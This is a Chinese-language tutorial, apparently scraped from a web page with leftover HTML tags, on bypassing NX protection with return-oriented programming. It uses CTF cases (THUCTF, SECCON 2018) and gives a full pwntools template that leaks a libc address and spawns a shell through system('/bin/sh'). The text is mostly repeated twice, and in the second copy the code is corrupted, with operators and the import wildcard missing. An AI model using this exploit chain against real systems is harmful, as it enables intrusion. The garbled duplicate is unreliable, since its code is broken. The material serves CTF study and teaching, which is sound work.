ROP 绕过 NX 保护技术详解<\/h1>

一、基础知识准备<\/h2>

1. x86与x64架构区别<\/h3>

内存地址范围<\/strong>：x86为32位，x64为64位（但可用地址≤0x00007fffffffffff）<\/li>

参数传递<\/strong>：

x86：所有参数通过栈传递<\/li>
x64：前6个参数依次通过RDI、RSI、RDX、RCX、R8和R9寄存器传递，多余参数通过栈传递<\/li> <\/ul> <\/li> <\/ul>
2. 函数调用约定<\/h3>

_stdcall（Windows API默认）<\/li>
_cdecl（C\/C++默认）<\/li>
_fastcall<\/li>
_thiscall<\/li>
CTF中关键点<\/strong>：通过IDA阅读汇编代码确定参数传递顺序和堆栈平衡方式<\/li> <\/ul>
3. libc.so文件的作用<\/h3>

提供libc函数之间的偏移地址<\/li>
libc加载基地址会变化，但函数相对偏移固定<\/li> <\/ul>
4. NX保护原理<\/h3>

No-eXecute（不可执行）保护<\/li>
将数据所在内存页标识为不可执行<\/li>
防止直接在栈中执行shellcode<\/li> <\/ul>
5. 输入输出函数特性<\/h3>

函数<\/th> 特性<\/th> <\/tr> <\/thead>

scanf("%s",str)<\/td> 读取非空白字符，遇到空格\/tab\/回车结束，添加\0<\/td> <\/tr>
gets(str)<\/td> 读取到回车，用\0替换\n<\/td> <\/tr>
printf("%s",str)<\/td> 输出到\0结束<\/td> <\/tr>
puts(str)<\/td> 输出到\0结束，末尾添加\n<\/td> <\/tr>
read\/write<\/td> 严格按指定字节数操作，可处理任意字符<\/td> <\/tr> <\/tbody> <\/table>
二、ROP技术原理<\/h2>
1. 基本ROP攻击流程<\/h3>

覆盖返回地址指向gadget地址<\/li>
执行gadget中的指令（如pop rdi; ret）<\/li>
将参数放入寄存器（如\/bin\/sh地址放入rdi）<\/li>
跳转到目标函数（如system）<\/li> <\/ol>
2. 关键问题解决<\/h3>

gadget搜索<\/strong>：使用ROPgadget工具<\/p>
ROPgadget --binary <binary> | grep "pop rdi"<\/span> <\/span><\/span><\/code><\/pre><\/li> \/bin\/sh字符串<\/strong>：<\/p> 检查程序是否已有<\/li> 若无，写入.bss段（通过read\/scanf\/gets）<\/li> <\/ul> <\/li> system函数地址<\/strong>：<\/p> 泄露已执行过的libc函数地址<\/li> 计算libc基地址：libc_base = leaked_addr - libc_offset<\/code><\/li> 计算system地址：system_addr = libc_base + system_offset<\/code><\/li> <\/ul> <\/li> <\/ol> 三、ROP绕过NX具体步骤<\/h2> 1. 信息收集阶段<\/h3> 确定溢出点位置（IDA静态分析或GDB动态调试）<\/li> 检查可用函数：输出函数：write\/printf\/puts（用于泄露地址）<\/li> 输入函数：read\/scanf\/gets（用于写入数据）<\/li> <\/ul> <\/li> 查找.bss段地址：readelf -S <binary><\/code>或IDA查看<\/li> <\/ul> 2. 地址泄露阶段<\/h3> 构造payload1泄露libc函数地址 payload1 =<\/span> padding +<\/span> p64(pop_rdi) +<\/span> p64(got_addr) +<\/span> p64(puts_plt) +<\/span> p64(vuln_addr) <\/span><\/span><\/code><\/pre><\/li> 接收泄露的地址并计算libc基地址<\/li> <\/ol> 3. 攻击实施阶段<\/h3> 写入"\/bin\/sh"到.bss段 payload2 =<\/span> padding +<\/span> p64(pop_rdi) +<\/span> p64(bss_addr) +<\/span> p64(gets_plt) +<\/span> ...<\/span> <\/span><\/span><\/code><\/pre><\/li> 调用system("\/bin\/sh") payload2 +=<\/span> p64(pop_rdi) +<\/span> p64(bss_addr) +<\/span> p64(system_addr) <\/span><\/span><\/code><\/pre><\/li> <\/ol> 四、实战案例解析<\/h2> 案例1：THUCTF - stackoverflowwithoutleak<\/h3> 特点<\/strong>：程序中已有system调用（doit函数）<\/li> 利用技巧<\/strong>：vul()函数中有mov rdi, rsp<\/code>指令<\/li> POC<\/strong>： buf =<\/span> "\/bin\/sh<\/span>\0<\/span>"<\/span> +<\/span> 'A'<\/span>*<\/span>(8192<\/span>-<\/span>8<\/span>) +<\/span> p64(0x400722<\/span>) <\/span><\/span><\/code><\/pre><\/li> <\/ul> 案例2：Seccon 2018 - classic<\/h3> 确定溢出长度<\/strong>：48+24字节<\/li> 泄露puts地址<\/strong>： payload1 =<\/span> 'a'<\/span>*<\/span>(48<\/span>+<\/span>24<\/span>) +<\/span> p64(poprdi_ret) +<\/span> p64(0x601018<\/span>) +<\/span> p64(puts_plt) +<\/span> p64(vuln_addr) <\/span><\/span><\/code><\/pre><\/li> 处理puts输出特性<\/strong>（注意\n和\0问题）<\/li> 计算system地址<\/strong>： system_addr =<\/span> put_addr -<\/span> put_libc +<\/span> system_libc <\/span><\/span><\/code><\/pre><\/li> 最终攻击<\/strong>： payload2 =<\/span> 'a'<\/span>*<\/span>(48<\/span>+<\/span>24<\/span>) +<\/span> p64(poprdi_ret) +<\/span> p64(bss_addr) +<\/span> p64(gets_plt) <\/span><\/span> +<\/span> p64(poprdi_ret) +<\/span> p64(bss_addr) +<\/span> p64(system_addr) <\/span><\/span><\/code><\/pre><\/li> <\/ol> 五、实用技巧与工具<\/h2> GDB输入不可见字符<\/strong>：<\/p> with<\/span> open("input"<\/span>, "wb"<\/span>) as<\/span> f: <\/span><\/span> f.<\/span>write("<\/span>\xa9\x06\x40\x00\x00\x00\x00\x00<\/span>"<\/span>) <\/span><\/span>gdb><\/span> r <<\/span> input <\/span><\/span><\/code><\/pre><\/li> 常用工具<\/strong>：<\/p> ROPgadget<\/li> pwntools<\/li> IDA Pro<\/li> GDB<\/li> <\/ul> <\/li> 调试技巧<\/strong>：<\/p> 使用p.recvuntil()<\/code>清理不必要输出<\/li> 单独测试leak函数确保正确性<\/li> 注意函数延迟绑定机制<\/li> <\/ul> <\/li> <\/ol> 六、完整POC模板<\/h2> from<\/span> pwn import<\/span> *<\/span> <\/span><\/span> <\/span><\/span># 设置libc<\/span> <\/span><\/span>libc =<\/span> ELF('.\/libc.so.6'<\/span>) <\/span><\/span>puts_libc =<\/span> libc.<\/span>symbols['puts'<\/span>] <\/span><\/span>system_libc =<\/span> libc.<\/span>symbols['system'<\/span>] <\/span><\/span> <\/span><\/span># 程序信息<\/span> <\/span><\/span>puts_plt =<\/span> 0x400520<\/span> <\/span><\/span>gets_plt =<\/span> 0x400560<\/span> <\/span><\/span>pop_rdi =<\/span> 0x400753<\/span> <\/span><\/span>vuln_addr =<\/span> 0x4006A9<\/span> <\/span><\/span>bss_addr =<\/span> 0x601060<\/span> <\/span><\/span> <\/span><\/span># 第一次泄露<\/span> <\/span><\/span>p =<\/span> process('.\/binary'<\/span>) <\/span><\/span>payload1 =<\/span> 'A'<\/span>*<\/span>72<\/span> +<\/span> p64(pop_rdi) +<\/span> p64(0x601018<\/span>) +<\/span> p64(puts_plt) +<\/span> p64(vuln_addr) <\/span><\/span>p.<\/span>sendline(payload1) <\/span><\/span> <\/span><\/span># 处理泄露地址<\/span> <\/span><\/span>leak =<\/span> u64(p.<\/span>recv(8<\/span>).<\/span>ljust(8<\/span>, '<\/span>\x00<\/span>'<\/span>)) <\/span><\/span>libc_base =<\/span> leak -<\/span> puts_libc <\/span><\/span>system_addr =<\/span> libc_base +<\/span> system_libc <\/span><\/span> <\/span><\/span># 第二次攻击<\/span> <\/span><\/span>payload2 =<\/span> 'A'<\/span>*<\/span>72<\/span> +<\/span> p64(pop_rdi) +<\/span> p64(bss_addr) +<\/span> p64(gets_plt) <\/span><\/span>payload2 +=<\/span> p64(pop_rdi) +<\/span> p64(bss_addr) +<\/span> p64(system_addr) <\/span><\/span>p.<\/span>sendline(payload2) <\/span><\/span>p.<\/span>sendline('\/bin\/sh<\/span>\0<\/span>'<\/span>) <\/span><\/span> <\/span><\/span>p.<\/span>interactive() <\/span><\/span><\/code><\/pre>通过以上详细讲解和实战案例，应该能够掌握ROP绕过NX保护的核心技术和实践方法。关键是要理解原理，灵活应用各种gadget，并注意不同环境和函数的特性差异。<\/p>

函数<\/th>	特性<\/th> <\/tr> <\/thead>
scanf("%s",str)<\/td>	读取非空白字符，遇到空格\/tab\/回车结束，添加\0<\/td> <\/tr>
gets(str)<\/td>	读取到回车，用\0替换\n<\/td> <\/tr>
printf("%s",str)<\/td>	输出到\0结束<\/td> <\/tr>
puts(str)<\/td>	输出到\0结束，末尾添加\n<\/td> <\/tr>
read\/write<\/td>	严格按指定字节数操作，可处理任意字符<\/td> <\/tr> <\/tbody> <\/table> 二、ROP技术原理<\/h2> 1. 基本ROP攻击流程<\/h3> 覆盖返回地址指向gadget地址<\/li> 执行gadget中的指令（如pop rdi; ret）<\/li> 将参数放入寄存器（如\/bin\/sh地址放入rdi）<\/li> 跳转到目标函数（如system）<\/li> <\/ol> 2. 关键问题解决<\/h3> gadget搜索<\/strong>：使用ROPgadget工具<\/p> ROPgadget --binary <binary> \| grep "pop rdi"<\/span> <\/span><\/span><\/code><\/pre><\/li> \/bin\/sh字符串<\/strong>：<\/p> 检查程序是否已有<\/li> 若无，写入.bss段（通过read\/scanf\/gets）<\/li> <\/ul> <\/li> system函数地址<\/strong>：<\/p> 泄露已执行过的libc函数地址<\/li> 计算libc基地址：libc_base = leaked_addr - libc_offset<\/code><\/li> 计算system地址：system_addr = libc_base + system_offset<\/code><\/li> <\/ul> <\/li> <\/ol> 三、ROP绕过NX具体步骤<\/h2> 1. 信息收集阶段<\/h3> 确定溢出点位置（IDA静态分析或GDB动态调试）<\/li> 检查可用函数：输出函数：write\/printf\/puts（用于泄露地址）<\/li> 输入函数：read\/scanf\/gets（用于写入数据）<\/li> <\/ul> <\/li> 查找.bss段地址：readelf -S <binary><\/code>或IDA查看<\/li> <\/ul> 2. 地址泄露阶段<\/h3> 构造payload1泄露libc函数地址 payload1 =<\/span> padding +<\/span> p64(pop_rdi) +<\/span> p64(got_addr) +<\/span> p64(puts_plt) +<\/span> p64(vuln_addr) <\/span><\/span><\/code><\/pre><\/li> 接收泄露的地址并计算libc基地址<\/li> <\/ol> 3. 攻击实施阶段<\/h3> 写入"\/bin\/sh"到.bss段 payload2 =<\/span> padding +<\/span> p64(pop_rdi) +<\/span> p64(bss_addr) +<\/span> p64(gets_plt) +<\/span> ...<\/span> <\/span><\/span><\/code><\/pre><\/li> 调用system("\/bin\/sh") payload2 +=<\/span> p64(pop_rdi) +<\/span> p64(bss_addr) +<\/span> p64(system_addr) <\/span><\/span><\/code><\/pre><\/li> <\/ol> 四、实战案例解析<\/h2> 案例1：THUCTF - stackoverflowwithoutleak<\/h3> 特点<\/strong>：程序中已有system调用（doit函数）<\/li> 利用技巧<\/strong>：vul()函数中有mov rdi, rsp<\/code>指令<\/li> POC<\/strong>： buf =<\/span> "\/bin\/sh<\/span>\0<\/span>"<\/span> +<\/span> 'A'<\/span><\/span>(8192<\/span>-<\/span>8<\/span>) +<\/span> p64(0x400722<\/span>) <\/span><\/span><\/code><\/pre><\/li> <\/ul> 案例2：Seccon 2018 - classic<\/h3> 确定溢出长度<\/strong>：48+24字节<\/li> 泄露puts地址<\/strong>： payload1 =<\/span> 'a'<\/span><\/span>(48<\/span>+<\/span>24<\/span>) +<\/span> p64(poprdi_ret) +<\/span> p64(0x601018<\/span>) +<\/span> p64(puts_plt) +<\/span> p64(vuln_addr) <\/span><\/span><\/code><\/pre><\/li> 处理puts输出特性<\/strong>（注意\n和\0问题）<\/li> 计算system地址<\/strong>： system_addr =<\/span> put_addr -<\/span> put_libc +<\/span> system_libc <\/span><\/span><\/code><\/pre><\/li> 最终攻击<\/strong>： payload2 =<\/span> 'a'<\/span><\/span>(48<\/span>+<\/span>24<\/span>) +<\/span> p64(poprdi_ret) +<\/span> p64(bss_addr) +<\/span> p64(gets_plt) <\/span><\/span> +<\/span> p64(poprdi_ret) +<\/span> p64(bss_addr) +<\/span> p64(system_addr) <\/span><\/span><\/code><\/pre><\/li> <\/ol> 五、实用技巧与工具<\/h2> GDB输入不可见字符<\/strong>：<\/p> with<\/span> open("input"<\/span>, "wb"<\/span>) as<\/span> f: <\/span><\/span> f.<\/span>write("<\/span>\xa9\x06\x40\x00\x00\x00\x00\x00<\/span>"<\/span>) <\/span><\/span>gdb><\/span> r <<\/span> input <\/span><\/span><\/code><\/pre><\/li> 常用工具<\/strong>：<\/p> ROPgadget<\/li> pwntools<\/li> IDA Pro<\/li> GDB<\/li> <\/ul> <\/li> 调试技巧<\/strong>：<\/p> 使用p.recvuntil()<\/code>清理不必要输出<\/li> 单独测试leak函数确保正确性<\/li> 注意函数延迟绑定机制<\/li> <\/ul> <\/li> <\/ol> 六、完整POC模板<\/h2> from<\/span> pwn import<\/span> <\/span> <\/span><\/span> <\/span><\/span># 设置libc<\/span> <\/span><\/span>libc =<\/span> ELF('.\/libc.so.6'<\/span>) <\/span><\/span>puts_libc =<\/span> libc.<\/span>symbols['puts'<\/span>] <\/span><\/span>system_libc =<\/span> libc.<\/span>symbols['system'<\/span>] <\/span><\/span> <\/span><\/span># 程序信息<\/span> <\/span><\/span>puts_plt =<\/span> 0x400520<\/span> <\/span><\/span>gets_plt =<\/span> 0x400560<\/span> <\/span><\/span>pop_rdi =<\/span> 0x400753<\/span> <\/span><\/span>vuln_addr =<\/span> 0x4006A9<\/span> <\/span><\/span>bss_addr =<\/span> 0x601060<\/span> <\/span><\/span> <\/span><\/span># 第一次泄露<\/span> <\/span><\/span>p =<\/span> process('.\/binary'<\/span>) <\/span><\/span>payload1 =<\/span> 'A'<\/span><\/span>72<\/span> +<\/span> p64(pop_rdi) +<\/span> p64(0x601018<\/span>) +<\/span> p64(puts_plt) +<\/span> p64(vuln_addr) <\/span><\/span>p.<\/span>sendline(payload1) <\/span><\/span> <\/span><\/span># 处理泄露地址<\/span> <\/span><\/span>leak =<\/span> u64(p.<\/span>recv(8<\/span>).<\/span>ljust(8<\/span>, '<\/span>\x00<\/span>'<\/span>)) <\/span><\/span>libc_base =<\/span> leak -<\/span> puts_libc <\/span><\/span>system_addr =<\/span> libc_base +<\/span> system_libc <\/span><\/span> <\/span><\/span># 第二次攻击<\/span> <\/span><\/span>payload2 =<\/span> 'A'<\/span><\/span>72<\/span> +<\/span> p64(pop_rdi) +<\/span> p64(bss_addr) +<\/span> p64(gets_plt) <\/span><\/span>payload2 +=<\/span> p64(pop_rdi) +<\/span> p64(bss_addr) +<\/span> p64(system_addr) <\/span><\/span>p.<\/span>sendline(payload2) <\/span><\/span>p.<\/span>sendline('\/bin\/sh<\/span>\0<\/span>'<\/span>) <\/span><\/span> <\/span><\/span>p.<\/span>interactive() <\/span><\/span><\/code><\/pre>通过以上详细讲解和实战案例，应该能够掌握ROP绕过NX保护的核心技术和实践方法。关键是要理解原理，灵活应用各种gadget，并注意不同环境和函数的特性差异。<\/p>